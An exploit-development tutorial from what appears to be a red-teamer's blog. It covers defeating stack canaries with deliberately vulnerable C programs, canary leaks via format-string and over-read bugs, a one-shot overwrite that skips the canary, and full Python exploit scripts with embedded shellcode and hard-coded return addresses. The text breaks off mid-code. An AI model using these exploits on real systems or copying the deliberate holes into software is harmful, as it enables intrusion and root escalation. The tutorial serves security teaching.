0xNinjaCyclone Blog

Penetration tester and Red teamer


[Exploit development] 0A- Dancing with Memory Guards: Breaking Canaries/Cookies, DEP/NX, and ASLR

Intro

In the previous post, we discussed stack-based buffer overflow vulnerabilities in depth from several angles: the methods used to discover them, including fuzzing and how we can benefit from it; strategies for exploiting them based on the nature of the targeted program and how it works; and the protections against them, along with some common mistakes that allow those protections to be bypassed. You must read it to understand this post, as we will build on what was covered there.

One of the things we explained was hijacking the execution flow by overwriting the instruction pointer and forging it with another pointer that references our own instructions. In this way, we would force the program to execute arbitrary code of our own. Unfortunately, life isn’t that easy, as there are many powerful protections and mitigations that prevent us from doing this so simply.

But don’t worry, my friend. I don’t deny the power and effectiveness of these protections, especially when they are combined, which makes exploitation more difficult and complex. However, if we fully understand how these protections work and how the targeted program works, we can bypass them with creative tricks.

The F*ckin Mousetrap ( Cookies / Canaries )

This type of memory protection is exactly like a mousetrap. When your home has openings that let mice get in and mess around, one solution is to set traps baited with cheese. As soon as the mice fall into a trap, you get rid of them, which reduces the danger they pose to vital things in the home. However, some clever mice detect the trick, avoid the trap, and carry on with their mission. That is where the philosophy of cookie/canary protection comes from, and we will follow the same philosophy, playing the clever mice, to bypass it without falling into the trap.

https://www.wibu.com/pl/magazine/keynote-articles/article/detail/traps-against-hacker.html

A canary/cookie is a random value generated when the program starts executing, so it is different on every run. The compiler places a copy of it in the stack frame of each protected function, between the function’s local variables (its buffers) and the saved base pointer and return address. Before the function returns, it compares the copy in its frame with the original value. If they differ, the canary has been hit, which indicates an overflow. In that case, the function does not return; the program is aborted instead. That thwarts any exploit that overflows a buffer to overwrite the saved instruction pointer, because the overflow has to trample the canary on its way there.

Analyzing Security Canaries/Cookies

Let’s take the following code as an example:

#include <stdio.h>

void main() {
  char cName[16];
  scanf("%s", cName);
  puts( cName );
}

And compile it as follows:

┌──(user㉿host)-[~]
└─$ gcc test.c -o test

Then we disassemble the main function and find the following instructions:

0000000000001149 <main>:
    1149:       55                      push   rbp
    114a:       48 89 e5                mov    rbp,rsp
    114d:       48 83 ec 10             sub    rsp,0x10
    1151:       48 8d 45 f0             lea    rax,[rbp-0x10]
    1155:       48 89 c6                mov    rsi,rax
    1158:       48 8d 05 a5 0e 00 00    lea    rax,[rip+0xea5]        # 2004 <_IO_stdin_used+0x4>
    115f:       48 89 c7                mov    rdi,rax
    1162:       b8 00 00 00 00          mov    eax,0x0
    1167:       e8 d4 fe ff ff          call   1040 <__isoc99_scanf@plt>
    116c:       48 8d 45 f0             lea    rax,[rbp-0x10]
    1170:       48 89 c7                mov    rdi,rax
    1173:       e8 b8 fe ff ff          call   1030 <puts@plt>
    1178:       90                      nop
    1179:       c9                      leave
    117a:       c3                      ret

This is roughly the familiar format of the instructions we’ve seen in previous posts. But let me show you how it will look when we ask the compiler to integrate canary/cookie protection.

┌──(user㉿host)-[~]
└─$ gcc -fstack-protector test.c -o test
                    

Focus on this picture carefully and compare this disassembly with the previous one.

In the prologue of main, eight bytes are loaded from the FS segment (fs:0x28, a slot in the thread’s thread-local storage where glibc keeps the reference canary) and stored on the stack between the local buffer and the saved base pointer, at RBP-0x8. In the epilogue, the copy on the stack is compared with the original. The comparison works as follows:

  1. The canary/cookie previously stored on the stack is loaded into the accumulator register (RAX).
  2. The original canary/cookie in the FS segment is subtracted from that value.
  3. If both are the same, the result is zero and the Zero Flag is set, so the conditional jump skips ahead to the leave/ret instructions.
  4. Otherwise, execution falls through to a call to __stack_chk_fail, which displays a fatal error message and terminates the process.

When we pass an oversized input, execution is diverted to the __stack_chk_fail function, which prints an error telling us that stack smashing was detected and aborts the process; a backtrace shows it being killed with SIGABRT inside the __pthread_kill_implementation function.

The stack layout is exactly like follows:

        *--------------------------* <-- Frame data & Buffers
        |                          |
        |                          |
        |                          |
-0x8 -> *--------------------------* <-- Canary / Cookie
        |                          |
+0x0 -> *--------------------------* <-- Saved RBP ( Base Pointer )
        |                          |
+0x8 -> *--------------------------* <-- Saved RIP ( Instruction Pointer )
        |                          |      
        *--------------------------*
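To make the prologue/epilogue logic concrete, here is a toy Python model of the frame above. It is only a sketch under simplifying assumptions: the 16-byte buffer, the saved RBP/RIP values and the `Frame` class are hypothetical, the overflowing copy is clipped to the modeled frame, and `reference` stands in for the original value at fs:0x28.

```python
import secrets
import struct

BUF_SIZE = 16  # hypothetical buffer size, like cName[16] in the first example


def new_canary() -> int:
    # Random 64-bit value with its least significant byte forced to zero,
    # mimicking the canaries glibc generates on x86-64
    return secrets.randbits(64) & ~0xFF


class Frame:
    """Toy frame, low to high addresses: [buffer][canary][saved RBP][saved RIP]."""

    def __init__(self, canary: int):
        self.reference = canary  # plays the role of the original value at fs:0x28
        self.mem = bytearray(BUF_SIZE) + struct.pack(
            "<QQQ", canary, 0x7FFFFFFFE000, 0x555555555200  # hypothetical RBP/RIP
        )

    def unsafe_copy(self, data: bytes) -> None:
        # Like scanf("%s"): no bounds check, so input spills past the buffer
        # (clipped to the modeled frame to keep the sketch simple)
        data = data[: len(self.mem)]
        self.mem[: len(data)] = data

    def epilogue_check(self) -> bool:
        stack_copy = struct.unpack_from("<Q", self.mem, BUF_SIZE)[0]
        # Same idea as the epilogue: subtract, and only a zero result passes
        return stack_copy - self.reference == 0


canary = new_canary()

ok = Frame(canary)
ok.unsafe_copy(b"Alice")
print(ok.epilogue_check())       # True: the canary is intact, ret is reached

smashed = Frame(canary)
smashed.unsafe_copy(b"A" * 40)   # buffer + canary + saved RBP + saved RIP
print(smashed.epilogue_check())  # False: __stack_chk_fail would abort here
```

The model also shows why the canary sits where it does: any linear overflow that reaches the saved RIP must pass through it first.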

It’s really a big challenge because the canary is placed in a critical location, where we have to overwrite it to get into vital stuff like the instruction pointer.

Leaking it out Leads to Winning!

One strategy to defeat canaries/cookies is to leak them first, then craft a payload that contains the leaked canary at the right offset. The overflow then writes the canary’s own value back over it, so the comparison in the epilogue succeeds because the canary on the stack after the attack is still the same as the original. Let’s take an example:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    char data[256];
    char *cpReadData;
    int nSize;
} Buffer;

Buffer buf_new() {
    return (Buffer) { 0x00 };
}

void buf_write(Buffer *pBuf, char *cpData, size_t n) {
    if ( pBuf->nSize ) 
        pBuf->data[ pBuf->nSize-1 ] = ' ';

    memcpy( pBuf->data + pBuf->nSize, cpData, n );
    pBuf->nSize += n;
}

void buf_read(Buffer *pBuf) {
    if ( !pBuf->cpReadData )
        pBuf->cpReadData = pBuf->data;

    printf( pBuf->cpReadData );
    pBuf->cpReadData += pBuf->nSize;
}

void buf_readall(Buffer *pBuf) {
    printf( pBuf->data );
}

void main() {
    Buffer buf = buf_new();
    int nChoice, c;

    for ( ;; ) {
        printf( "\n\n1- Write\n2- Read\n3- Read full data\n4- Exit\n\nChoose: " );
        scanf( "%d", &nChoice );

        // Clearing the buffer so nothing breaks `getdelim` later ;)
        while ( (c = getchar()) != 0x0a && c != EOF ); 
        
        if ( nChoice == 1 ) {
            char *cpLine = NULL;
            size_t n = 0;
            printf( "Data: " );
            n = getdelim( (char **)&cpLine, &n, 0x0a, stdin );
            if ( ~n ) // Sanity check to avoid calling `buf_write` if `getdelim` failed
                buf_write( &buf, cpLine, n );
            free( cpLine );
        }

        else if ( nChoice == 2 )
            buf_read( &buf );

        else if ( nChoice == 3 )
            buf_readall( &buf );

        else if ( nChoice == 4 )
            break;
        
        else 
            puts( "[-] Invalid choice!" );
    }
}

This is a simple program that allows users to write and read data interactively. Let’s compile and run it with the canary protection enabled:

┌──(user㉿host)-[~]
└─$ gcc -fstack-protector -zexecstack test.c -o test
                                                                                                                                                         
┌──(user㉿host)-[~]
└─$ ./test


1- Write
2- Read
3- Read full data
4- Exit

Choose: 1
Data: Hello Guys


1- Write
2- Read
3- Read full data
4- Exit

Choose: 2
Hello Guys


1- Write
2- Read
3- Read full data
4- Exit

Choose: 1
Data: I'm 0xNinjaCyclone


1- Write
2- Read
3- Read full data
4- Exit

Choose: 2
I'm 0xNinjaCyclone


1- Write
2- Read
3- Read full data
4- Exit

Choose: 3
Hello Guys I'm 0xNinjaCyclone


1- Write
2- Read
3- Read full data
4- Exit

Choose: 4
                                                                                                                                                         
┌──(user㉿host)-[~]
└─$ 

If you pay attention to the read functions, you will find that both are vulnerable to the format string vulnerability, because user-controlled data is passed to the printf function as the format string instead of in a safe way. The buf_read function is also vulnerable to a buffer over-read: it prints whatever the pBuf->cpReadData pointer points to and then advances the pointer by pBuf->nSize, without ever checking whether the new location still belongs to the buffer it is supposed to read from. Exploiting either of these two bugs would allow us to leak the secret canary/cookie.
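The over-read in buf_read can be seen without running the program. The sketch below models only the cursor arithmetic (cpReadData relative to data), assuming a single 11-byte write ("Hello Guys\n", as in the session above) followed by repeated reads; `read_offsets` is a hypothetical helper, not part of the program.

```python
DATA_SIZE = 256  # sizeof(Buffer.data)


def read_offsets(n_size: int, reads: int) -> list:
    """Offset from Buffer.data that each successive buf_read() prints from."""
    offsets = []
    cursor = 0  # models pBuf->cpReadData - pBuf->data
    for _ in range(reads):
        offsets.append(cursor)  # printf( pBuf->cpReadData )
        cursor += n_size        # pBuf->cpReadData += pBuf->nSize
    return offsets


offsets = read_offsets(11, 30)
first_oob = next(i for i, off in enumerate(offsets) if off >= DATA_SIZE)
print(first_oob + 1, hex(offsets[first_oob]))  # 25 0x108
```

Nothing stops the cursor at the end of the 256-byte array: the 25th read already starts outside it, in the memory that follows the buffer on the stack.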

As you can see, we can exploit the format string bug to leak the canary by injecting %49$p as a payload via the write function and leaking it out by leveraging the read function. Read the format string exploitation post to understand what we did. We can automate this using Python as follows:

def leak_canary(p: Popen):
    p.stdin.write( b"1\n" + b"%49$p\n" + b"2\n" )
    p.stdin.flush()
    out = b""
    canary_pos = -1
    n = 0
    
    while n < 1024:
        out = p.stdout.readline()
        canary_pos = out.find( b"0x" )
        if bool( ~canary_pos ):
            break

        n += 1

    else:
        return -1

    canary = int( out[canary_pos : canary_pos+18], 16 )
    return canary

This function takes a handle to the target process, injects the payload, leaks the canary, and returns it to the caller as an integer, or returns -1 on failure. (The bool( ~x ) checks rely on ~(-1) being 0, so they are true for any value other than -1.)
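Where does 49 come from? On x86-64 System V, printf’s first five variadic arguments are taken from RSI, RDX, RCX, R8 and R9, so %6$p is the first 8-byte stack slot at [rsp] when `call printf` executes, %7$p is the next one, and so on. The hypothetical helper below turns a target address into that index. The RSP value in the example is made up so that it reproduces %49$p; in practice, you would read both addresses in gdb at the call to printf.

```python
def positional_index(target_addr: int, rsp_at_call: int) -> int:
    """Return N such that "%N$p" prints the qword at target_addr (x86-64 SysV).

    Arguments 1-5 come from RSI, RDX, RCX, R8, R9; argument 6 is [rsp] at the
    `call printf` instruction, argument 7 is [rsp+8], and so on.
    """
    delta = target_addr - rsp_at_call
    if delta < 0 or delta % 8:
        raise ValueError("target must be an 8-byte aligned slot at or above rsp")
    return 6 + delta // 8


canary_addr = 0x7FFFFFFFDD48       # canary address seen in gdb (ASLR off)
rsp_at_call = canary_addr - 0x158  # hypothetical RSP at the call to printf
print(positional_index(canary_addr, rsp_at_call))  # 49
```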

Now, we can craft a payload that overwrites the canary with the correct value, injects a shellcode, and redirects the execution flow by overwriting the instruction pointer.

def hijack_exec(p: Popen, canary):
    payload = b""
    payload += b"A" * 0x112                               # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", 0x7fffffffdd60 + 0x40 ) # Instruction pointer
    payload += b"\x90" * 0x40                             # NOPs for padding
    payload += buf                                        # Shellcode

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

We followed the same approach we discussed in the buffer overflow post: we fill the frame with junk data, put the correct canary in its place to pass the check, inject the shellcode past the saved return address (into the caller’s frame), and replace the saved instruction pointer with the address of the shellcode, which sits after 0x40 bytes of NOP padding. The hard-coded stack address 0x7fffffffdd60 (the slot right after the saved instruction pointer) only stays valid while ASLR is disabled. However, for the shellcode to execute, the main function must return. We can do this using the fourth option (Exit), which breaks the loop and allows the main function to return.

def exit_target(p: Popen):
    p.stdin.write( b"4\n" )
    p.stdin.flush()  # Make sure the choice actually reaches the target

This function must be called after the injection to force the program to execute the shellcode.

def main():
    # We use 'stdbuf -o0' to force the targeted program pipes to be flushed
    # So we can read leaked canary/cookie immediately
    p = Popen( ["stdbuf", "-o0", TARGET_PATH], stdin=PIPE, stdout=PIPE )

    # Make stdout non-blocking when using read/readline
    flags = fcntl.fcntl( p.stdout, fcntl.F_GETFL )
    fcntl.fcntl( p.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK )

    canary = leak_canary( p )
    
    if bool( ~canary ):
        print( "Canary : 0x%x" % canary )
        hijack_exec( p, canary )
        exit_target( p )
        out, _ = p.communicate()
        print( out.decode() )
    else:
        exit_target( p )
        print( "[-] Failed to leak the canary" )

In the main function, we start the target process through the stdbuf -o0 command, which makes the target’s stdout unbuffered (otherwise glibc fully buffers stdout when it is a pipe), so the leaked canary reaches us while the process is still running. We also switch our end of the stdout pipe to non-blocking mode, so a read never hangs waiting for output that will not come, which would deadlock the exploit. Next, we leak the canary. If that succeeds, we inject the payload and trigger it with the Exit option; if it fails, we simply tell the target to exit.
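Polling readline() on a non-blocking pipe, as leak_canary does, works but burns CPU and depends on a retry counter. A common alternative, swapped in here and not what the exploit above uses, is to wait with select() until the pipe is readable. `recv_until` is a hypothetical helper built on the standard select and os modules (Unix only). Pass it p.stdout.fileno(), and don’t mix it with p.stdout.readline(): data already buffered by the file object is invisible to os.read().

```python
import os
import select


def recv_until(fd: int, marker: bytes, timeout: float = 2.0) -> bytes:
    """Read from a pipe until `marker` appears, EOF, or `timeout` seconds of silence."""
    data = b""
    while marker not in data:
        # Wait until the pipe has data (or EOF), but no longer than `timeout`
        ready, _, _ = select.select([fd], [], [], timeout)
        if not ready:
            break  # nothing arrived in time: return what we have
        chunk = os.read(fd, 4096)
        if not chunk:
            break  # EOF: the target closed its stdout
        data += chunk
    return data
```

For example, recv_until(p.stdout.fileno(), b"Choose: ") returns everything up to the next menu prompt, possibly a little more, since one chunk can extend past the marker.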

Let’s run the exploit:

Great, we bypassed the stack canary and executed shellcode that runs the ‘id’ command. If the program is owned by root and has the SUID permission, we can gain root privileges, as we saw in the previous blog post.
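The 0x112 bytes of padding in hijack_exec follow from how buf_write appends: each write lands at data + nSize and then adds n (which includes the newline that getdelim keeps) to nSize. The leak wrote "%49$p\n" (6 bytes), so the overflow starts at offset 6. This sketch assumes the canary is 0x118 bytes past Buffer.data, as in the stack layout shown in the next section; `write_cursor` is a hypothetical helper.

```python
CANARY_OFF = 0x118  # canary offset from Buffer.data in this build (assumed)


def write_cursor(previous_writes: list) -> int:
    """Offset where the next buf_write() lands: nSize is the sum of every n so far."""
    return sum(len(chunk) for chunk in previous_writes)


start = write_cursor([b"%49$p\n"])          # the format-string leak
print(hex(start), hex(CANARY_OFF - start))  # 0x6 0x112
```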

Here is the full exploitation code:

#!/usr/bin/python3

import struct, os, fcntl
from subprocess import Popen, PIPE

TARGET_PATH = "./test"

# msfvenom -a x64 --platform linux -p linux/x64/exec -b "\x0a" -f py AppendExit=true CMD="id"
buf =  b""
buf += b"\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50"
buf += b"\x54\x5f\x52\x66\x68\x2d\x63\x54\x5e\x52\xe8\x03"
buf += b"\x00\x00\x00\x69\x64\x00\x56\x57\x54\x5e\x6a\x3b"
buf += b"\x58\x0f\x05\x48\x31\xff\x6a\x3c\x58\x0f\x05"

def leak_canary(p: Popen):
    p.stdin.write( b"1\n" + b"%49$p\n" + b"2\n" )
    p.stdin.flush()
    out = b""
    canary_pos = -1
    n = 0
    
    while n < 1024:
        out = p.stdout.readline()
        canary_pos = out.find( b"0x" )
        if bool( ~canary_pos ):
            break

        n += 1

    else:
        return -1

    canary = int( out[canary_pos : canary_pos+18], 16 )
    return canary

def hijack_exec(p: Popen, canary):
    payload = b""
    payload += b"A" * 0x112                               # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", 0x7fffffffdd60 + 0x40 ) # Instruction pointer
    payload += b"\x90" * 0x40                             # NOPs for padding
    payload += buf                                        # Shellcode

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

def exit_target(p: Popen):
    p.stdin.write( b"4\n" )
    p.stdin.flush()  # Make sure the choice actually reaches the target

def main():
    # We use 'stdbuf -o0' to force the targeted program pipes to be flushed
    # So we can read leaked canary/cookie immediately
    p = Popen( ["stdbuf", "-o0", TARGET_PATH], stdin=PIPE, stdout=PIPE )

    # Make stdout non-blocking when using read/readline
    flags = fcntl.fcntl( p.stdout, fcntl.F_GETFL )
    fcntl.fcntl( p.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK )

    canary = leak_canary( p )
    
    if bool( ~canary ):
        print( "Canary : 0x%x" % canary )
        hijack_exec( p, canary )
        exit_target( p )
        out, _ = p.communicate()
        print( out.decode() )
    else:
        exit_target( p )
        print( "[-] Failed to leak the canary" )

if __name__ == '__main__':
    main()

Therefore, the reading functions must be modified as follows to prevent such a leak from occurring:

#include <stdbool.h>
bool g_bCanRead = false;

void buf_write(Buffer *pBuf, char *cpData, size_t n) {
    if ( pBuf->nSize ) 
        pBuf->data[ pBuf->nSize-1 ] = ' ';

    memcpy( pBuf->data + pBuf->nSize, cpData, n );
    pBuf->nSize += n;
    g_bCanRead = true;
}

void buf_read(Buffer *pBuf) {
    if ( !pBuf->cpReadData )
        pBuf->cpReadData = pBuf->data;

    if ( !g_bCanRead ) {
        fputs( "[-] Cannot Read", stderr );
        return;
    }

    printf( "%s", pBuf->cpReadData );
    // nSize is the total amount written so far, so the next unread byte is at
    // data + nSize (adding nSize to the cursor would overshoot after two writes)
    pBuf->cpReadData = pBuf->data + pBuf->nSize;
    g_bCanRead = false;
}

void buf_readall(Buffer *pBuf) {
    printf( "%s", pBuf->data );
}

This modification fixes the memory disclosure vulnerabilities in the program: user input is now passed to printf as an argument of a fixed "%s" format instead of as the format itself, and buf_read is restricted to one read per write and always resumes right after the data it has already printed, which prevents over-reading the buffer.

┌──(user㉿host)-[~]
└─$ python3 exploit.py                              
[-] Failed to leak the canary   

The exploit we developed is no longer effective. Fixing the memory disclosure bugs broke it, because it relied on exploiting one of them as a link in the exploitation chain.

Don’t Worry We Still Can Leak It Without Additional Bugs

Having a vulnerability that allows data to be leaked from memory can be very helpful, but we don’t always have one. In such cases, the alternative is to use the buffer overflow itself to leak secret and sensitive data from memory. Let’s review the stack layout. It looks like this:

0x00 -> *--------------------------* <-- Injection Point
        |                          |
        |                          |
        |                          |
        |                          |
        |                          |
        |                          |
0x100-> *--------------------------* <-- Buffer->cpReadData
        |                          |
0x108-> *--------------------------* <-- Buffer->nSize
        |                          |
0x110-> *--------------------------* <-- Junk data
        |                          |      
0x118-> *--------------------------* <-- Canary / Cookie
        |                          |      
0x120-> *--------------------------* <-- Saved RBP ( Base Pointer )
        |                          |      
0x128-> *--------------------------* <-- Saved RIP ( Instruction Pointer )
        |                          |      
        *--------------------------*

Do you notice something? The Buffer->cpReadData pointer used to read memory is within reach of our overflow. We can forge that address, make it point to any other location we want in memory, and leak its content. Our plan goes as follows:

  1. Filling the buffer until getting into the targeted pointer using the write function.
  2. Overwriting the Buffer->cpReadData with the canary address.
  3. Leaking out the canary by triggering the read function.
  4. Triggering the write function again to overwrite the remaining data with a crafted payload.
  5. Triggering shellcode execution by leveraging the exit option, which makes main return.

(gdb) c
Continuing.

Breakpoint 1, 0x00005555555553cf in main ()
(gdb) x/a $rbp-8
0x7fffffffdd48: 0xe1125f7dcee84f00

I attached gdb to the target process and put a breakpoint inside the main function. Examining the canary shows that it lives at 0x7fffffffdd48 in memory. However, there is a problem here: the canary always contains a null byte at its lowest-order position (the Least Significant Byte, which comes first in little-endian memory). glibc zeroes that byte on purpose so that string functions stop before reaching the rest of the canary, and printf would stop there too. Therefore, we read from that address plus one so the null byte doesn’t stop us, take the seven leaked bytes, and prepend the null byte ourselves.

def leak_canary(p: Popen):
    payload = b""
    payload += b"A" * 0x100                         # Filling the stack frame
    payload += struct.pack( "<Q", 0x7fffffffdd49 )  # Buffer->cpReadData
    payload += (b"\x00" * 0x8)                      # Buffer->nSize zeroed ( buf_write then adds n, leaving 0x111 )

    p.stdin.write( b"1\n" + payload + b"\n2\n" )
    p.stdin.flush()

    out = b""
    canary_pos = -1
    n = 0
    
    while n < 1024:
        out = p.stdout.readline()
        canary_pos = out.find( b"Choose: " )
        if bool( ~canary_pos ) and canary_pos+15 < len(out):
            canary_pos += 8
            break

        n += 1

    else:
        return -1

    canary = struct.unpack( "<Q", b"\x00" + out[canary_pos : canary_pos+7] )[ 0 ]
    return canary

This function does what we discussed earlier: it leaks the canary data, attempts to parse it into an integer value, and then returns it to the caller. Things are going well, so we just need to make a few changes to the hijack_exec function, and everything will be in order.

def hijack_exec(p: Popen, canary):
    payload = b""
    payload += b"A" * 0x7                                 # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", 0x7fffffffdd60 + 0x40 ) # Instruction pointer
    payload += b"\x90" * 0x40                             # NOPs for padding
    payload += buf                                        # Shellcode

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

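We changed nothing except the first line. The leak payload already filled most of the frame: it zeroed Buffer->nSize, and buf_write then added the payload’s length (0x110 bytes plus the newline), leaving nSize at 0x111. The next write therefore starts at offset 0x111, and only 0x7 bytes of padding separate it from the canary at offset 0x118.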
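The same arithmetic can be checked by replaying the leak payload against a byte-array model of the frame. This is a sketch: `buf_write_model` is hypothetical, the offsets come from the stack layout above, and nSize is modeled as a 4-byte little-endian int.

```python
import struct

CPREAD_OFF, NSIZE_OFF, CANARY_OFF = 0x100, 0x108, 0x118  # offsets from Buffer.data


def buf_write_model(mem: bytearray, chunk: bytes) -> None:
    """Replay buf_write(): memcpy at data + nSize, then nSize += n."""
    n_size = struct.unpack_from("<i", mem, NSIZE_OFF)[0]
    if n_size:
        mem[n_size - 1] = ord(" ")            # the previous '\n' becomes ' '
    mem[n_size:n_size + len(chunk)] = chunk   # memcpy(data + nSize, cpData, n)
    # nSize is reloaded from memory because the copy itself may have overwritten it
    new_size = struct.unpack_from("<i", mem, NSIZE_OFF)[0] + len(chunk)
    struct.pack_into("<i", mem, NSIZE_OFF, new_size)


mem = bytearray(0x130)  # Buffer + junk + canary + saved RBP + saved RIP
leak = b"A" * 0x100 + struct.pack("<Q", 0x7FFFFFFFDD49) + b"\x00" * 8 + b"\n"
buf_write_model(mem, leak)

n_size = struct.unpack_from("<i", mem, NSIZE_OFF)[0]
cp_read = struct.unpack_from("<Q", mem, CPREAD_OFF)[0]
print(hex(n_size), hex(cp_read), CANARY_OFF - n_size)  # 0x111 0x7fffffffdd49 7
```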

Bingo, our plan worked.
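The null-byte trick used by leak_canary can be isolated in a few lines. A sketch, assuming a little-endian x86-64 target and the canary address from the gdb session above; `rebuild_canary` is a hypothetical helper. If one of the seven random bytes happens to be 0x00, printf stops early and the leak comes back short, so the sketch refuses it instead of guessing.

```python
import struct

CANARY_ADDR = 0x7FFFFFFFDD48  # from the gdb session (ASLR disabled)
LEAK_ADDR = CANARY_ADDR + 1   # skip the null LSB so printf doesn't stop immediately


def rebuild_canary(leaked: bytes) -> int:
    """Turn the bytes printed from LEAK_ADDR back into the full 64-bit canary."""
    if len(leaked) < 7:
        raise ValueError("short leak: a canary byte was probably 0x00, retry")
    # Little-endian: the zeroed LSB comes first, followed by the 7 leaked bytes
    return struct.unpack("<Q", b"\x00" + leaked[:7])[0]


# What the leak prints for the canary seen in gdb: bytes 1..7 of its encoding
leaked = struct.pack("<Q", 0xE1125F7DCEE84F00)[1:]
print(hex(LEAK_ADDR), hex(rebuild_canary(leaked)))  # 0x7fffffffdd49 0xe1125f7dcee84f00
```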

Jumping Over The Sh1t

Not all programs are designed to operate interactively. Many take input from the user and perform their tasks in one fell swoop. In this case, we cannot first leak the canary (whether through a vulnerability or another technique) and then complete the attack by reusing the overflow to hijack the program’s execution, because the canary is regenerated the next time the program runs. We need a creative way to defeat this protection in one shot. This isn’t easy and depends mainly on the logic of the targeted program and how it works. Let us take an example:

#include <stdio.h>
#include <stdlib.h>

typedef struct {
    char data[64];
    int nSize;
} Buffer;

Buffer buf_new() {
    return (Buffer) { 0x00 };
}

void buf_write(Buffer *pBuf, char *cpData, size_t n) {
    while ( n-- )
        pBuf->data[ pBuf->nSize++ ] = *cpData++;
}
void buf_read(Buffer *pBuf) {
    printf( "%s", pBuf->data );
}

void main() {
    Buffer buf = buf_new();
    char *cpLine = NULL;
    size_t n = 0;

    printf( "Data: " );
    n = getdelim( (char **)&cpLine, &n, 0x0a, stdin );

    if ( ~n ) // Sanity check to avoid calling `buf_write` if `getdelim` failed
        buf_write( &buf, cpLine, n );

    puts( "Your Data :" );
    buf_read( &buf );
}

This example is similar to the previous one. There’s nothing new in it except that it doesn’t work interactively. It reads from the user and prints the user’s input to the screen.

┌──(user㉿host)-[~]
└─$ gcc -fstack-protector -zexecstack test.c -o test
                                                                                                                                                         
┌──(user㉿host)-[~]
└─$ ./test                                          
Data: Hello Guys, I'm 0xNinjaCyclone.
Your Data :
Hello Guys, I'm 0xNinjaCyclone.

Focus well on this line:

        pBuf->data[ pBuf->nSize++ ] = *cpData++;

It looks like ordinary code that copies data from one memory location to another byte by byte. But it’s not, my friend. We can abuse it in a very sinister way to jump over the canary without damaging it. Let me explain what I mean. On each iteration, it uses pBuf->nSize as an index into pBuf->data, copies one byte from the memory pointed to by cpData to that location, and increments both pBuf->nSize and cpData by one so that the next iteration moves the next byte. It keeps doing this in a loop until all the data has been copied.

The variable that tells the program where to write, pBuf->nSize, sits right after the 64-byte data array, so it is within reach of our overflow. However, we cannot overwrite it in one go: the copy proceeds one byte at a time, so the first out-of-bounds byte lands on the lowest-order byte (LSB) of nSize. That is enough to defeat the protection. Because the index is re-read from nSize on every iteration, changing that single byte changes where all the following bytes are written. We can make the write jump straight to the saved instruction pointer without writing sequentially over the canary and destroying it.

#!/usr/bin/python3

import struct

with open("payload", "wb") as f:
    f.write( b"A" * 64 )                          # Fills the Buffer 
    f.write( b"\x58" )                            # ( (unsigned char *) &Buffer->nSize )[0] ( LSB )
    f.write( struct.pack("<Q", 0x7fffffffdd70) )  # Instruction Pointer
    f.write( b"\x90" * 0x40 )                     # Own Code ( NOPs )

Let’s try this exploit and see if it will succeed in jumping over the canary or not.

As you can see, we’ve successfully defeated the canary and overwritten the instruction pointer, allowing us to hijack the program’s execution flow.
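The jump can be replayed in Python. This is a toy model under stated assumptions: the offsets (nSize at 0x40, canary at 0x48, saved RBP at 0x50, saved RIP at 0x58, all relative to buf.data) are inferred from the payload rather than read from the binary, and the incremented index is assumed to be stored before the byte itself, which is what makes 0x58 the right value (C does not guarantee the order of these two stores here).

```python
import struct

# Offsets relative to buf.data (inferred from the payload, not read from the binary)
NSIZE_OFF, CANARY_OFF, RBP_OFF, RIP_OFF = 0x40, 0x48, 0x50, 0x58


def run_buf_write(frame: bytearray, data: bytes) -> None:
    """Replay `pBuf->data[pBuf->nSize++] = *cpData++;` one byte at a time."""
    for byte in data:
        idx = struct.unpack_from("<i", frame, NSIZE_OFF)[0]  # index re-read every time
        struct.pack_into("<i", frame, NSIZE_OFF, idx + 1)    # nSize++ stored first (assumed)
        frame[idx] = byte                                    # then the byte is written


canary = 0xE1125F7DCEE84F00  # example value (the one seen in gdb earlier)
frame = bytearray(0x100)
struct.pack_into("<Q", frame, CANARY_OFF, canary)

payload = b"A" * 64 + b"\x58" + struct.pack("<Q", 0x7FFFFFFFDD70)
run_buf_write(frame, payload)

print(hex(struct.unpack_from("<Q", frame, CANARY_OFF)[0]))  # 0xe1125f7dcee84f00 (intact)
print(hex(struct.unpack_from("<Q", frame, RIP_OFF)[0]))     # 0x7fffffffdd70 (hijacked)
```

The 65th byte rewrites the LSB of nSize from 0x41 to 0x58, so the next eight bytes land on the saved RIP while the canary and saved RBP are never touched.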

Preempting The Canary/Cookie Protection

Another way to bypass this type of protection is to hijack the flow of program execution by some means other than the saved instruction pointer, before the canary value is validated. Since the check only happens when the function returns, we already have control by then, even if the canary value was destroyed. There are many scenarios that allow us to hijack the execution flow:

  1. Function Pointers: If we can overwrite a function pointer that gets called before the canary check occurs, we can bypass the protection.

  2. V-Table: It’s real magic. A vtable is a table of pointers to a class’s virtual methods, which C++ uses to support polymorphism: each object holds a pointer to its class’s table, so a call always reaches the object’s own method rather than its parent’s. If we can control that table (or the object’s pointer to it), we can make a virtual call execute our own code without being detected by the canary protection.

  3. Windows SEH: SEH stands for Structured Exception Handling, a Microsoft mechanism available to C/C++ programs for handling exceptions such as hardware faults. On 32-bit Windows, the exception registration records, each holding a pointer to a handler, are stored on the stack. If we overwrite one and then trigger an exception, the system dispatches to our forged handler, giving us code execution before the canary is ever validated.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>

typedef struct _Buffer {
    char data[64];
    int nSize;
    void (*write)(struct _Buffer *, char *, size_t);
    void (*read)(struct _Buffer *);
} Buffer;

void buf_write(Buffer *pBuf, char *cpData, size_t n) {
    memcpy( pBuf->data, cpData, n );
    pBuf->nSize += (int) n;
}

void buf_read(Buffer *pBuf) {
    puts( "Your Data :" );
    printf( "%s", pBuf->data );
}

Buffer buf_new(bool bShouldRead) {
    return (Buffer) {
        .data = { 0 },
        .nSize = 0,
        .write = buf_write,
